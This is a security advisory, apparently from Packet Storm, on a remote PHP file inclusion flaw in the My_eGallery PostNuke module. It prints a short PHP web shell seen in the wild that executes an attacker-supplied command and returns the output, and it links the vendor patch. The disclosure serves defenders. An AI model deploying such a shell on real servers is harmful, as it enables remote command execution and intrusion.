My_eGallery versions below 3.1.1.g has PHP files which do not filter all parameters fed to functions, allowing a malicious attacker the ability to execute any command as the user id the webserver is running under. Vendor supplied patch available here.
83bc5a715a3f8b447cc27c88355d9454d43230e49474dacf297362b2f0d3486f
Product: My_eGallery
Versions affected: all <3.1.1.g
Website: http://lottasophie.sourceforge.net/index.php
1. Introduction
---------------
My_eGallery is a very nice PostNuke module, which allows users to create and
manipulate their own galleries on the web, plus offers various additional
features.
For more information and a demonstration you can go to the Website above.
2. Exploit
----------
Any version of My_eGallery, prior to 3.1.1.g, is susceptible to this
vulnerability.
Certain php files have some parameters which are used in include functions
not filtered.
An intruder can craft PHP code on their Web site and supply parameter to
My_eGallery so it actually includes malicious PHP code.
The following code was captured as being used in the wild (edited
intentionally):
<?
// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
if (isset($chdir)) @chdir($chdir);
ob_start();
execute("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
print_output();
?>
This allows execution of any command on the server with My_eGallery, under
the privileges of the Web server (usually apache or httpd).
3. Solution
-----------
Vendor was contacted and promptly replied. Fix is available at the vendor's
site:
http://lottasophie.sourceforge.net/modules.php?op=modload&name=Downloads&fil
e=index&req=viewdownload&cid=5
As this was seen being exploited in the wild, users are urged to upgrade to
the latest version as soon as possible.
Regards,
Bojan Zdrnja
CISSP
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed